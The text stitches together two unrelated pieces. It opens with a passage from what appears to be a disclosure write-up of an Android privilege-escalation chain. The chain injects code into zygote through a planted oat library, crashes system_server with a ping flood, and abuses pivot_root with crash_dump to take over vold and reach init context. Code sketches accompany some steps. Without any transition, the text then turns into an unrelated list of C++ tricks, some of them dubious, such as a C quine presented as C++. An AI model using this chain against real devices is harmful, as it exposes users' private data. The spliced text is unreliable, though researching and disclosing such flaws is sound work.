In summary, at this point, we can mount a controlled filesystem over /data, with arbitrary file permissions and arbitrary SELinux contexts. Because we control file permissions and SELinux contexts, we can allow any process to access files on our filesystem — including mapping them with PROT_EXEC.

Injecting into zygote

The zygote process is relatively powerful, even though it is not listed as part of the TCB. By design, it runs with UID 0, can arbitrarily change its UID, and can perform dynamic SELinux transitions into the SELinux contexts of system_server and normal apps. In other words, the zygote has access to almost all user data on the device.

 

When the 64-bit zygote starts up on system boot, it loads code from /data/dalvik-cache/arm64/system@framework@boot*.{art,oat,vdex}. Normally, the oat file (which contains an ELF library that will be loaded with dlopen()) and the vdex file are symlinks to files on the immutable /system partition; only the art file is actually stored on /data. But we can instead make system@framework@boot.art and system@framework@boot.vdex symlinks to /system (to get around some consistency checks without knowing exactly which Android build is running on the device) while placing our own malicious ELF library at system@framework@boot.oat (with the SELinux context that the legitimate oat file would have). Then, by placing a function with __attribute__((constructor)) in our ELF library, we can get code execution in the zygote as soon as it calls dlopen() on startup.

 

The missing step at this point is that when the attack is performed, the zygote is already running; and this attack only works while the zygote is starting up.

Crashing the system

This part is a bit unpleasant.

 

When a critical system component (in particular, the zygote or system_server) crashes (which you can simulate on an eng build using kill), Android attempts to automatically recover from the crash by restarting most userspace processes (including the zygote). When this happens, the screen first shows the boot animation for a bit, followed by the lock screen with the "Unlock for all features and data" prompt that normally only shows up after boot. However, the key material for accessing user data is still present at this point, as you can verify if ADB is on by running "ls /sdcard" on the device.

 

This means that if we can somehow crash system_server, we can then inject code into the zygote during the following userspace restart and will be able to access user data on the device.

 

Of course, mounting our own filesystem over /data is very crude and makes all sorts of things fail, but surprisingly, the system doesn’t immediately fall over — while parts of the UI become unusable, most places have some error handling that prevents the system from failing so clearly that a restart happens.
After some experimentation, it turned out that Android’s code for tracking bandwidth usage has a safety check: If the network usage tracking code can’t write to disk and >=2MiB (mPersistThresholdBytes) of network traffic have been observed since the last successful write, a fatal exception is thrown. This means that if we can create some sort of network connection to the device and then send it >=2MiB worth of ping flood, then trigger a stats writeback by either waiting for a periodic writeback or changing the state of a network interface, the device will reboot.

 

To create a network connection, there are two options:

 

  • Connect to a wifi network. Before Android 9, even when the device is locked, it is normally possible to connect to a new wifi network by dragging down from the top of the screen, tapping the drop-down below the wifi symbol, then tapping on the name of an open wifi network. (This doesn’t work for networks protected with WPA, but of course an attacker can make their own wifi network an open one.) Many devices will also just autoconnect to networks with certain names.
  • Connect to an ethernet network. Android supports USB ethernet adapters and will automatically connect to ethernet networks.

 

For testing the exploit, a manually-created connection to a wifi network was used; for a more reliable and user-friendly exploit, you’d probably want to use an ethernet connection.

 

At this point, we can run arbitrary native code in zygote context and access user data; but we can’t yet read out the raw disk encryption key, directly access the underlying block device, or take a RAM dump (although at this point, half the data that would’ve been in a RAM dump is probably gone anyway thanks to the system crash). If we want to be able to do those things, we’ll have to escalate our privileges a bit more.

From zygote to vold

Even though the zygote is not supposed to be part of the TCB, it has access to the CAP_SYS_ADMIN capability in the initial user namespace, and the SELinux policy permits the use of this capability. The zygote uses this capability for the mount() syscall and for installing a seccomp filter without setting the NO_NEW_PRIVS flag. There are multiple ways to abuse CAP_SYS_ADMIN; in particular, on the Pixel 2, the following ways seem viable:

 

  • You can install a seccomp filter without NO_NEW_PRIVS, then perform an execve() with a privilege transition (SELinux exec transition, setuid/setgid execution, or execution with permitted file capability set). The seccomp filter can then force specific syscalls to fail with error number 0 — which e.g. in the case of open() means that the process will believe that the syscall succeeded and allocated file descriptor 0. This attack works here, but is a bit messy.
  • You can instruct the kernel to use a file you control as high-priority swap device, then create memory pressure. Once the kernel writes stack or heap pages from a sufficiently privileged process into the swap file, you can edit the swapped-out memory, then let the process load it back. Downsides of this technique are that it is very unpredictable, it involves memory pressure (which could potentially cause the system to kill processes you want to keep, and probably destroys many forensic artifacts in RAM), and requires some way to figure out which swapped-out pages belong to which process and are used for what. This requires the kernel to support swap.
  • You can use pivot_root() to replace the root directory of either the current mount namespace or a newly created mount namespace, bypassing the SELinux checks that would have been performed for mount(). Doing it for a new mount namespace is useful if you only want to affect a child process that elevates its privileges afterwards. This doesn’t work if the root filesystem is a rootfs filesystem. This is the technique used here.

 

In recent Android versions, the mechanism used to create dumps of crashing processes has changed: Instead of asking a privileged daemon to create a dump, processes execute one of the helpers /system/bin/crash_dump64 and /system/bin/crash_dump32, which have the SELinux label u:object_r:crash_dump_exec:s0. Currently, when a file with such a label is executed by any SELinux domain, an automatic domain transition to the crash_dump domain is triggered (which automatically implies setting the AT_SECURE flag in the auxiliary vector, instructing the linker of the new process to be careful with environment variables like LD_PRELOAD):

 

domain_auto_trans(domain, crash_dump_exec, crash_dump);

 

At the time this bug was reported, the crash_dump domain had the following SELinux policy:

 

[…]
allow crash_dump {
 domain
 -init
 -crash_dump
 -keystore
 -logd
}:process { ptrace signal sigchld sigstop sigkill };
[…]
r_dir_file(crash_dump, domain)
[…]

 

This policy permitted crash_dump to attach to processes in almost any domain via ptrace() (providing the ability to take over the process if the DAC controls permit it) and allowed it to read properties of any process in procfs. The exclusion list for ptrace access lists a few TCB processes; but notably, vold was not on the list. Therefore, if we can execute crash_dump64 and somehow inject code into it, we can then take over vold.

 

Note that the ability to actually ptrace() a process is still gated by the normal Linux DAC checks, and crash_dump can’t use CAP_SYS_PTRACE or CAP_SETUID. If a normal app managed to inject code into crash_dump64, it still wouldn’t be able to leverage that to attack system components because of the UID mismatch.

 

If you’ve been reading carefully, you might now wonder whether we could just place our own binary with context u:object_r:crash_dump_exec:s0 on our fake /data filesystem, and then execute that to gain code execution in the crash_dump domain. This doesn’t work because vold — very sensibly — hardcodes the MS_NOSUID flag when mounting USB storage devices, which not only degrades the execution of classic setuid/setgid binaries, but also degrades the execution of files with file capabilities and executions that would normally involve automatic SELinux domain transitions (unless the SELinux policy explicitly opts out of this behavior by granting PROCESS2__NOSUID_TRANSITION).

 

To inject code into crash_dump64, we can create a new mount namespace with unshare() (using our CAP_SYS_ADMIN capability), then call pivot_root() to point the root directory of our process into a directory we fully control, and then execute crash_dump64. Then the kernel parses the ELF headers of crash_dump64, reads the path to the linker (/system/bin/linker64), loads the linker into memory from that path (relative to the process root, so we can supply our own linker here), and executes it.
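A minimal sketch of that namespace trick (not the actual exploit code; /tmp/fakeroot and the argv are placeholders for the attacker-controlled directory and target binary):

#include <sched.h>
#include <sys/mount.h>
#include <sys/syscall.h>
#include <unistd.h>

int run_under_fake_root(const char *fakeroot, char *const argv[]) {
    if (unshare(CLONE_NEWNS)) return -1;                  // new mount namespace
    // make sure our mount changes don't propagate back out
    if (mount(NULL, "/", NULL, MS_REC | MS_PRIVATE, NULL)) return -1;
    // the new root must be a mount point: bind it onto itself
    if (mount(fakeroot, fakeroot, NULL, MS_BIND, NULL)) return -1;
    if (chdir(fakeroot)) return -1;
    if (syscall(SYS_pivot_root, ".", ".")) return -1;     // pivot into it
    umount2(".", MNT_DETACH);                             // detach the old root
    execv(argv[0], argv);       // e.g. /system/bin/crash_dump64 under our root
    return -1;
}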

 

At this point, we can execute arbitrary code in crash_dump context and escalate into vold from there, compromising the TCB. At this point, Android’s security policy considers us to have kernel-equivalent privileges; however, to see what you’d have to do from here to gain code execution in the kernel, this blogpost goes a bit further.

From vold to init context

It doesn’t look like there is an easy way to get from vold into the real init process; however, there is a way into the init SELinux context. Looking through the SELinux policy for allowed transitions into init context, we find the following policy:

 

domain_auto_trans(kernel, init_exec, init)

 

This means that if we can get code running in kernel context to execute a file we control labeled init_exec, on a filesystem that wasn’t mounted with MS_NOSUID, then our file will be executed in init context.

 

The only code that is running in kernel context is the kernel, so we have to get the kernel to execute the file for us. Linux has a mechanism called "usermode helpers" that can do this: Under some circumstances, the kernel will delegate actions (such as creating coredumps, loading key material into the kernel, performing DNS lookups, …) to userspace code. In particular, when a nonexistent key is looked up (e.g. via request_key()), /sbin/request-key (hardcoded, can only be changed to a different static path at kernel build time with CONFIG_STATIC_USERMODEHELPER_PATH) will be invoked.

 

Being in vold, we can simply mount our own ext4 filesystem over /sbin without MS_NOSUID, then call request_key(), and the kernel invokes our request-key in init context.
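For illustration, looking up a key that doesn’t exist is enough to make the kernel spawn the usermode helper; a minimal sketch (the key type and description here are arbitrary placeholders):

#include <sys/syscall.h>
#include <unistd.h>

int main() {
    // looking up a nonexistent "user" key forces the kernel to invoke
    // its request-key usermode helper to try to instantiate it
    syscall(SYS_request_key, "user", "nonexistent-description",
            (const char *)0, 0 /* default keyring */);
    return 0;
}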

 

The exploit stops at this point; however, the following section describes how you could build on it to gain code execution in the kernel.

From init context to the kernel

From init context, it is possible to transition into modprobe or vendor_modprobe context by executing an appropriately labeled file after explicitly requesting a domain transition (note that this is domain_trans(), which permits a transition on exec, not domain_auto_trans(), which automatically performs a transition on exec):

 

domain_trans(init, { rootfs toolbox_exec }, modprobe)
domain_trans(init, vendor_toolbox_exec, vendor_modprobe)

 

modprobe and vendor_modprobe have the ability to load kernel modules from appropriately labeled files:

 

allow modprobe self:capability sys_module;
allow modprobe { system_file }:system module_load;
allow vendor_modprobe self:capability sys_module;
allow vendor_modprobe { vendor_file }:system module_load;

 

Android nowadays doesn’t require signatures for kernel modules:

 

walleye:/ # zcat /proc/config.gz | grep MODULE
CONFIG_MODULES_USE_ELF_RELA=y
CONFIG_MODULES=y
# CONFIG_MODULE_FORCE_LOAD is not set
CONFIG_MODULE_UNLOAD=y
CONFIG_MODULE_FORCE_UNLOAD=y
CONFIG_MODULE_SRCVERSION_ALL=y
# CONFIG_MODULE_SIG is not set
# CONFIG_MODULE_COMPRESS is not set
CONFIG_MODULES_TREE_LOOKUP=y
CONFIG_ARM64_MODULE_CMODEL_LARGE=y
CONFIG_ARM64_MODULE_PLTS=y
CONFIG_RANDOMIZE_MODULE_REGION_FULL=y
CONFIG_DEBUG_SET_MODULE_RONX=y

 

Therefore, you could execute an appropriately labeled file to execute code in modprobe context, then load an appropriately labeled malicious kernel module from there.

Lessons learned

Notably, this attack crosses two weakly-enforced security boundaries: The boundary from blkid_untrusted to vold (when vold uses the UUID provided by blkid_untrusted in a pathname without checking that it resembles a valid UUID) and the boundary from the zygote to the TCB (by abusing the zygote’s CAP_SYS_ADMIN capability). Software vendors have, very rightly, been stressing for quite some time that it is important for security researchers to be aware of what is, and what isn’t, a security boundary; but it is also important for vendors to decide where they want to have security boundaries and then rigorously enforce those boundaries. Unenforced security boundaries can be of limited use (for example, as a development aid while stronger isolation is in development), but they can also have negative effects by obfuscating how important a component is for the security of the overall system.

In this case, the weakly-enforced security boundary between vold and blkid_untrusted actually contributed to the vulnerability, rather than mitigating it. If the blkid code had run in the vold process, it would not have been necessary to serialize its output, and the injection of a fake UUID would not have worked.

What are some fun C++ tricks

This one applies to all languages so far:

a=a+b-(b=a);

A REALLY fast way of swapping a and b (though note that it reads and modifies b in the same expression, which is undefined behavior before C++17, so treat it as a party trick rather than safe code).

#include <iostream>
#include <string>

using namespace std;

int main (int argc, char *argv[]) {
    float a; cout << "A:"; cin >> a;
    float b; cout << "B:"; cin >> b;

    cout << "---------------------" << endl;
    cout << "A=" << a << ", B=" << b << endl;
    a=a+b-(b=a);
    cout << "A=" << a << ", B=" << b << endl;
    return 0;
}
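For comparison, a minimal sketch of the well-defined way to do the same thing is plain std::swap, which optimizers handle at least as well:

#include <iostream>
#include <utility>

int main() {
    float a = 1.5f, b = 2.5f;
    std::swap(a, b);   // well-defined regardless of evaluation order
    std::cout << "A=" << a << ", B=" << b << std::endl; // A=2.5, B=1.5
}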


void Send(int * to, const int* from, const int count)
{
    int n = (count+7) / 8;
    switch(count%8)
    {
    case 0: do { *to++ = *from++;
    case 7:      *to++ = *from++;
    case 6:      *to++ = *from++;
    case 5:      *to++ = *from++;
    case 4:      *to++ = *from++;
    case 3:      *to++ = *from++;
    case 2:      *to++ = *from++;
    case 1:      *to++ = *from++;
            } while (--n>0);
    }
}
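This construct is the classic Duff’s device: the switch jumps into the middle of the unrolled loop to handle the remainder, and the do/while then finishes the full rounds of eight. A quick usage sketch (assuming the Send() above is in scope):

#include <cassert>

int main() {
    int src[20], dst[20];
    for (int i = 0; i < 20; i++) src[i] = i;
    Send(dst, src, 20);   // enters at case 4, then runs two full rounds of 8
    assert(dst[0] == 0 && dst[19] == 19);
    return 0;
}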


Preprocessor Tricks

The arraysize macro used in Chrome’s source:

template <typename T, size_t N>
char (&ArraySizeHelper(T (&array)[N]))[N];
#define arraysize(array) (sizeof(ArraySizeHelper(array)))

This is better than the ordinary sizeof(array)/sizeof(array[0]) because it raises a compilation error when the passed-in array is just a pointer or a null pointer, whereas the simpler expression silently returns a useless value. For a detailed example, see PVS-Studio vs Chromium.
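A small sketch of the difference (the names here just mirror the macro above):

#include <cstddef>

template <typename T, size_t N>
char (&ArraySizeHelper(T (&array)[N]))[N];
#define arraysize(array) (sizeof(ArraySizeHelper(array)))

int main() {
    int a[10];
    int *p = a;
    static_assert(arraysize(a) == 10, "deduced from the array type");
    // arraysize(p);               // compile error: p is not an array
    // sizeof(p) / sizeof(p[0]);   // compiles, but is silently wrong
    (void)p;
}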

Predefined Macros:

#define expect(expr) if(!(expr)) cerr << "Assertion " << #expr \
    << " failed at " << __FILE__ << ":" << __LINE__ << endl;
#define stringify(x) #x
#define tostring(x) stringify(x)
#define MAGIC_CONSTANT 314159
cout << "Value of MAGIC_CONSTANT=" << tostring(MAGIC_CONSTANT);

The tostring macro is a common trick used to expand macro values inside other macros. The Linux kernel uses a lot of macro tricks.

Using iterators for quickly dumping the contents of a container:

#define dbg(v) copy(v.begin(), v.end(), ostream_iterator<typeof(*v.begin())>(cout, " "))

Sadly, this doesn’t work for pair types so maps are out of scope.

Template Voodoo

Recursion: You can specialize your class templates for certain cases, so you can write down the base-case of a recursion and then define the generic template as a recursive combination of base cases.
For example, the following code calculates the values of the Choose function at compile time:

template<unsigned n, unsigned r>
struct Choose {
    enum {value = (n * Choose<n-1, r-1>::value) / r};
};
template<unsigned n>
struct Choose<n, 0> {
    enum {value = 1};
};
int main() {
    // Prints 56
    cout << Choose<8, 3>::value;
    // Compile time values can be used as array sizes
    int x[Choose<25, 3>::value];
}

More interesting examples at C++ Programming/Templates/Template Meta-Programming

Mostly Painless Memory Management and RAII

With certain restrictions, you can create templates for "smart" pointers that automatically deallocate resources when they go out of scope or when their reference count goes to 0. This is basically done by overloading operator * and operator =. Based on your use case, you can transfer ownership when operator = is used, or update reference counts.
See Smart Pointer Guidelines — The Chromium Projects and http://code.google.com/searchfra…

Argument-dependent name lookup aka Koenig lookup

When a function call cannot be matched to a name in the current namespace, other namespaces can be searched for a matching signature. This is why std::cout << "Hi"; works even though operator << is defined in the std namespace.
See Argument-dependent name lookup
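A small sketch of ADL in action with a user-defined namespace:

#include <iostream>

namespace geo {
    struct Point { int x, y; };
    // found via ADL because the argument's type lives in namespace geo
    std::ostream& operator<<(std::ostream& out, const Point& p) {
        return out << "(" << p.x << ", " << p.y << ")";
    }
}

int main() {
    geo::Point p{3, 4};
    std::cout << p << "\n";   // no "using namespace geo" needed
}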


auto keyword
In C++ you can use auto to iterate over map, vector, set, etc. auto specifies that the type of the variable being declared will be deduced automatically from its initializer; for functions, the return type can be deduced from the return statements.
So instead of :

vector<int> vs;
vs.push_back(4), vs.push_back(7), vs.push_back(9), vs.push_back(10);
for (vector<int>::iterator it = vs.begin(); it != vs.end(); ++it)
    cout << *it << ' ';
cout << '\n';

just use :

vector<int> vs;
vs.push_back(4), vs.push_back(7), vs.push_back(9), vs.push_back(10);
for (auto it: vs)
    cout << it << ' ';
cout << endl;
// you can also change the values:
for (auto& it: vs) it *= 3;
for (auto it: vs)
    cout << it << ' ';
cout << endl;

Declaring variables

template<class A, class B>
auto mult(A x, B y) -> decltype(x * y) {
    return x * y;
}
int main() {
    auto a = 3 * 2; // the type of a is the type of the expression (x*y)
    cout << a << endl;
    return 0;
}

The Power of Strings 

int n, m;
cin >> n >> m;
int matrix[n+1][m+1];
// This loop
for (int i = 1; i <= n; i++) {
    for (int j = 1; j <= m; j++)
        cout << matrix[i][j] << " ";
    cout << "\n";
}
// is equivalent to this
for (int i = 1; i <= n; i++)
    for (int j = 1; j <= m; j++)
        cout << matrix[i][j] << " \n"[j == m];
because " \n" is a char*," \n"[0] is ' ' and " \n"[1] is '\n'  .

Some hidden functions
__gcd(x, y)
you don’t need to code a gcd function.

cout << __gcd(54, 48) << endl; // returns 6

__builtin_ffs(x)
This function returns 1 + the index of the least significant 1-bit of x. If x == 0, it returns 0. Here x is int; with suffix ‘l’ the function takes a long argument and with suffix ‘ll’ a long long argument.
e.g.: __builtin_ffs(10) = 2, because 10 is '...1010' in base 2 and the first 1-bit from the right is at index 1 (0-based), and the function returns 1 + index.

Pairing tricks 

pair<int, int> p;
// This
p = make_pair(1, 2);
// is equivalent to this
p = {1, 2};
// So this nested pair
pair<int, pair<char, long long> > pp;
// is now easier
pp = {1, {'a', 2ll}};

Super include 
Simply use
#include <bits/stdc++.h>
This header includes many of the libraries we need, like algorithm, iostream, vector and many more. Believe me, you don’t need to include anything else 😀 !!

Smart Pointers

Using smart pointers, we can make pointers work in a way that we don’t need to explicitly call delete. A smart pointer is a wrapper class over a pointer with operators like * and -> overloaded. Objects of a smart pointer class look like pointers, but can do many things a normal pointer can’t, like automatic destruction (yes, we don’t have to explicitly use delete), reference counting and more.
The idea is to make a class with a pointer, a destructor and overloaded operators like * and ->. Since the destructor is automatically called when an object goes out of scope, the dynamically allocated memory is automatically deleted (or the reference count can be decremented).
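Here is a minimal sketch of that idea: a single-owner scoped pointer with no reference counting (the standard library’s std::unique_ptr and std::shared_ptr are the real tools for this):

#include <iostream>

template <typename T>
class ScopedPtr {
    T *ptr;
public:
    explicit ScopedPtr(T *p) : ptr(p) {}
    ~ScopedPtr() { delete ptr; }              // automatic destruction
    T& operator*()  const { return *ptr; }
    T* operator->() const { return ptr; }
    ScopedPtr(const ScopedPtr&) = delete;     // single owner: no copies
    ScopedPtr& operator=(const ScopedPtr&) = delete;
};

int main() {
    ScopedPtr<int> p(new int(42));
    std::cout << *p << "\n";   // used like a raw pointer
}                              // delete happens here, with no explicit call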


You can put URIs in your C++ code and the compiler will not throw any error.

#include <iostream>
int main() {
    using namespace std;
    http://www.google.com
    int x = 5;
    cout << x;
}

Explanation: Any identifier followed by a : becomes a (goto) label in C++. Anything after // becomes a comment, so in the code above, http is a label and //www.google.com is a comment. The compiler might throw a warning, however, since the label is unused.


Don’t Confuse Assign (=) with Test-for-Equality (==).

This one is elementary, although it might have baffled Sherlock Holmes. The following looks innocent and would compile and run just fine if C++ were more like BASIC:

if (a = b)
cout << "a is equal to b.";

Because this looks so innocent, it creates logic errors requiring hours to track down within a large program unless you’re on the lookout for it. (So when a program requires debugging, this is the first thing I look for.) In C and C++, the following is not a test for equality:

a = b

What this does, of course, is assign the value of b to a and then evaluate to the value assigned.
The problem is that a = b does not generally evaluate to a reasonable true/false condition (with one major exception I’ll mention later). But in C and C++, any numeric value can be used as a condition for "if" or "while".
Assume that a and b are set to 0. The effect of the previously shown if statement is to place the value of b into a; then the expression a = b evaluates to 0. The value 0 equates to false. Consequently, a and b are equal, but exactly the wrong thing gets printed:

if (a = b)     // THIS ENSURES a AND b ARE EQUAL…
cout << "a and b are equal.";
else
cout << "a and b are not equal.";  // BUT THIS GETS PRINTED!

The solution, of course, is to use test-for-equality when that’s what you want. Note the use of double equal signs (==). This is correct inside a condition.

// CORRECT VERSION:
if (a == b)
cout << "a and b are equal.";


The most amazing trick I found was in the status of someone’s TopCoder profile:
Code:
#include <cstdio>
double m[] = {7709179928849219.0, 771};
int main()
{
    m[1]--?m[0]*=2,main():printf((char*)m);
}
You will be seriously amazed by the output... here it is:
C++Sucks

I tried to analyse the code and came up with a reason, but not an exact explanation, so I asked about it on Stack Overflow; you can go through the explanation here:
Concept behind this 4 lines tricky C++ code
Read it and you will learn something you wouldn’t have even thought of… 😉


static const unsigned char BitsSetTable256[256] =
{
#   define B2(n) n, n+1, n+1, n+2
#   define B4(n) B2(n), B2(n+1), B2(n+1), B2(n+2)
#   define B6(n) B4(n), B4(n+1), B4(n+1), B4(n+2)
    B6(0), B6(1), B6(1), B6(2)
};
unsigned int v; // count the number of bits set in 32-bit value v
unsigned int c; // c is the total bits set in v
// Option 1:
c = BitsSetTable256[v & 0xff] +
    BitsSetTable256[(v >> 8) & 0xff] +
    BitsSetTable256[(v >> 16) & 0xff] +
    BitsSetTable256[v >> 24];
// Option 2:
unsigned char * p = (unsigned char *) &v;
c = BitsSetTable256[p[0]] +
    BitsSetTable256[p[1]] +
    BitsSetTable256[p[2]] +
    BitsSetTable256[p[3]];
// To initially generate the table algorithmically:
BitsSetTable256[0] = 0;
for (int i = 0; i < 256; i++)
{
    BitsSetTable256[i] = (i & 1) + BitsSetTable256[i / 2];
}

 

 

float Q_rsqrt( float number )
{
    long i;
    float x2, y;
    const float threehalfs = 1.5F;

    x2 = number * 0.5F;
    y = number;
    i = * ( long * ) &y;            // evil floating point bit level hacking
    i = 0x5f3759df - ( i >> 1 );    // what the fuck?
    y = * ( float * ) &i;
    y = y * ( threehalfs - ( x2 * y * y ) );    // 1st iteration
//  y = y * ( threehalfs - ( x2 * y * y ) );    // 2nd iteration, this can be removed
    return y;
}

Iteration: 

#define FOR(i,n) for(int (i)=0;(i)<(n);(i)++)
#define FORR(i,a,b) for(int (i)=(a);(i)<(b);(i)++)
// reverse
#define REV(i,n) for(int (i)=(n)-1;(i)>=0;(i)--)

Some handy typedefs to go with them:

typedef long long int int64;
typedef unsigned long long int uint64;

Fast I/O for positive integers:

inline void frint(int *a){
    register char c=0; while (c<33) c=getchar_unlocked(); *a=0;
    while (c>33){*a=*a*10+c-'0'; c=getchar_unlocked();}
}

Try This….

#include <iostream>
using namespace std;
int main()
{
int a,b,c;
int count = 1;
for (b=c=10;a="- FIGURE?, UMKC,XYZHello Folks,\
TFy!QJu ROo TNn(ROo)SLq SLq ULo+\
UHs UJq TNn*RPn/QPbEWS_JSWQAIJO^\
NBELPeHBFHT}TnALVlBLOFAkHFOuFETp\
HCStHAUFAgcEAelclcn^r^r\\tZvYxXy\
T|S~Pn SPm SOn TNn ULo0ULo#ULo-W\
Hq!WFs XDt!" [b+++21]; )
for(; a-- > 64 ; )
putchar ( ++c=='Z' ? c = c/ 9:33^b&1);
return 0;
}


I think one of the coolest tricks of all time is defining an abstract base class in C++, inheriting from it in Python, and passing it back to C++ to call.
It actually works:

struct Interface{
    virtual int foo() const = 0;
    virtual ~Interface(){}
};
void call(Interface const& f){
    std::cout << f.foo() << std::endl;
}
struct InterfaceWrap final : Interface, boost::python::wrapper<Interface>
{
    int foo() const final
    {
        return this->get_override("foo")();
    }
};
BOOST_PYTHON_MODULE(interface){
    using namespace boost::python;
    class_<Interface, boost::noncopyable, boost::shared_ptr<Interface>>("_InterfaceCpp", no_init)
        .def("foo", &Interface::foo)
    ;
    class_<InterfaceWrap, bases<Interface>, boost::shared_ptr<InterfaceWrap>>("Interface", init<>())
    ;
    def("call", &call);
}

and then

import interface as i              # C++ code
class impl(i.Interface):           # inherit from C++ class
    def __init__(self):
        i.Interface.__init__(self)
    def foo(self):
        return 100
i.call(impl())                     # call C++ function with Python-derived class

This does exactly what you think it should do.


void qsort ( void * base, size_t num, size_t size, int ( * compar ) ( const void *, const void * ) )

base Pointer to the first element of the array to be sorted.

num Number of elements in the array pointed by base. size_t is an unsigned integral type.

size Size in bytes of each element in the array. size_t is an unsigned integral type.

compar: Function that compares two elements. It is called repeatedly by qsort to compare two elements, and shall follow this prototype:

int compar ( const void * elem1, const void * elem2 );

It takes two pointers as arguments (both type-cast to const void*). The function should compare the data pointed to by both: if they match in ranking, the function shall return zero; if elem1 goes before elem2, it shall return a negative value; and if it goes after, a positive value.

Eg :

int values[] = { 40, 10, 100, 90, 20, 25 };

int compare (const void * a, const void * b) { return ( *(int*)a - *(int*)b ); }

int main () {
    int n;
    qsort (values, 6, sizeof(int), compare);
    for (n=0; n<6; n++) printf ("%d ", values[n]);
    return 0;
}


Partial template specialization

C++11 has this cool function get<J> which can be used to access the first and second member of a pair, with a different syntax:

std::pair < std::string, double > pr ( "pi", 3.14 );
std::cout << std::get < 0 > ( pr ); // outputs "pi"
std::cout << std::get < 1 > ( pr ); // outputs 3.14

Note that this is a function and not a function object or a member function.

I do not find it trivial to write a function

  • with three template types template < size_t J, class T1, class T2 >
  • which can get std::pair < T1, T2 > as an argument
  • and outputs pr.first if the template value J is 0
  • and outputs pr.second if the template value J is 1.

In particular consider that in C++ one cannot overload a function based on its return type. So what should the return type of this function be declared as? T1 or T2?

template < size_t J, class T1, class T2>
??? get ( std::pair < T1, T2 > & );

The interesting thing is that one could already write this function in C++98 using Partial template specialization, which is a really cool trick. The problem is that function templates cannot be partially specialized, but this is easy to solve:

namespace
{
    /*!
     * helper template to do the work with partial specialization
     */
    template < size_t J, class T1, class T2 >
    struct Get;

    template < class T1, class T2>
    struct Get < 0, T1, T2 >
    {
        typedef typename std::pair < T1, T2 >::first_type result_type;
        static result_type & elm ( std::pair < T1, T2 > & pr ) { return pr.first; }
        static const result_type & elm ( const std::pair < T1, T2 > & pr ) { return pr.first; }
    };

    template < class T1, class T2>
    struct Get < 1, T1, T2 >
    {
        typedef typename std::pair < T1, T2 >::second_type result_type;
        static result_type & elm ( std::pair < T1, T2 > & pr ) { return pr.second; }
        static const result_type & elm ( const std::pair < T1, T2 > & pr ) { return pr.second; }
    };
}

template < size_t J, class T1, class T2 >
typename Get< J, T1, T2 >::result_type & get ( std::pair< T1, T2 > & pr )
{
    return Get < J, T1, T2 >::elm( pr );
}

template < size_t J, class T1, class T2 >
const typename Get< J, T1, T2 >::result_type & get ( const std::pair< T1, T2 > & pr )
{
    return Get < J, T1, T2 >::elm( pr );
}

Define operator<< for STL structures to make it easy to add debug outputs to your code. (This is better than special printing functions because it nests automatically! Printing a map< vector<int>, int> works without any additional effort if you can print any map and any vector.)

Additionally, define a macro that makes nicer debug outputs and makes it easy to turn them off using the standard mechanism (same one that is used for assert). Here’s a short example how to do all of this in C++11:

#include <iostream>
#include <string>
#include <map>

#ifdef NDEBUG
#define DEBUG(var)
#else
#define DEBUG(var) { std::cout << #var << ": " << (var) << std::endl; }
#endif

template<typename T1, typename T2>
std::ostream& operator<< (std::ostream& out, const std::map<T1,T2> &M) {
    out << "{ ";
    for (auto item:M) out << item.first << "->" << item.second << ", ";
    out << "}";
    return out;
}

int main() {
    std::map<std::string,int> age = { {"Joe",47}, {"Bob",22}, {"Laura",19} };
    DEBUG(age);
}

This is a very amazing piece of code:

main(a){printf(a,34,a="main(a){printf(a,34,a=%c%s%c,34);}",34);}

It is the shortest C++ code which, when executed, prints itself. It was discovered by Vlad Taeerov and Rashit Fakhreyev and is only 64 characters in length (making it the shortest).


To Convert list<T> to vector<T>:

std::vector<T> v(l.begin(), l.end());

 

Variadic Templates :

They can be useful in places; you can pass any number of parameters.
Example:
Example  :

#include <iostream>
#include <bitset>
#include <string>
using namespace std;

void print() {
    cout << "Nothing to print :)";
}

template<typename T, typename... Args>
void print(T x, Args... y) {
    cout << x << endl;
    print(y...);
}

int main() {
    print(10, 14.56, "Quora", bitset<20>(28));
    return 0;
}

 

Code on ideone: http://ideone.com/b8TNHD

Output :

10
14.56
Quora
00000000000000011100
Nothing to print :)

 

Range-based for loops can be used with some STL containers, e.g.:

 

#include <iostream>
#include <list>
#include <vector>

using namespace std;

int main() {
    list<int> x;
    x.push_back(10);
    x.push_back(20);
    for (auto i : x)
        cout << i;
    return 0;
}

Old but still C++ Tricks


1. Assign value by a pair of {} to a container

I see lots of programmers write code like this one:

pair<int, int> p;
// ...
p = make_pair(3, 4);

while you can just do this:

pair<int, int> p;
// ...
p = {3, 4};

even a more complex pair

pair<int, pair<char, long long> > p;
// ...
p = {3, {'a', 8ll}};

What about vector, deque, set and other containers?


vector<int> v;
v = {1, 2, 5, 2};
for (auto i: v)
    cout << i << ' ';
cout << '\n';
// prints "1 2 5 2"


deque<vector<pair<int, int>>> d;
d = {{{3, 4}, {5, 6}}, {{1, 2}, {3, 4}}};
for (auto i: d) {
    for (auto j: i)
        cout << j.first << ' ' << j.second << '\n';
    cout << "-\n";
}
// prints "3 4
//         5 6
//         -
//	   1 2
//	   3 4
//	   -"


set<int> s;
s = {4, 6, 2, 7, 4};
for (auto i: s)
    cout << i << ' ';
cout << '\n';
// prints "2 4 6 7"


list<int> l;
l = {5, 6, 9, 1};
for (auto i: l)
    cout << i << ' ';
cout << '\n';
// prints "5 6 9 1"


array<int, 4> a;
a = {5, 8, 9, 2};
for (auto i: a)
    cout << i << ' ';
cout << '\n';
// prints "5 8 9 2"


tuple<int, int, char> t;
t = {3, 4, 'f'};
cout << get<2>(t) << '\n';

Note that it doesn’t work for stack and queue.
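A sketch of the usual workaround: both are container adaptors, so you can brace-initialize their underlying container instead:

#include <deque>
#include <queue>
#include <stack>

int main() {
    std::stack<int> s(std::deque<int>{1, 2, 3});   // 3 on top
    std::queue<int> q(std::deque<int>{4, 5, 6});   // 4 at the front
}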

2. Name of argument in macros

You can use the ‘#’ sign to get the exact name of an argument passed to a macro:

#define what_is(x) cerr << #x << " is " << x << endl;
// ...
int a_variable = 376;
what_is(a_variable);
// prints "a_variable is 376"
what_is(a_variable * 2 + 1)
// prints "a_variable * 2 + 1 is 753"

3. Get rid of those includes!

Simply use

#include <bits/stdc++.h>

This header includes many of the libraries we need in contests, like algorithm, iostream, vector and many more. Believe me, you don’t need to include anything else!

4. Hidden function (not really hidden but not used often)

one)

__gcd(value1, value2)

You don’t need to code the Euclidean algorithm for a gcd function any more; this built-in function returns the gcd of two numbers.

e.g. __gcd(18, 27) = 9.

two)

__builtin_ffs(x)

